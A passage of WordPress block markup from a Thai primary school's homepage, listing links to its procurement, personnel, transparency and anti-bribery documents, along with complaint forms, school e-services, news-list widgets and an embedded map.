data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" 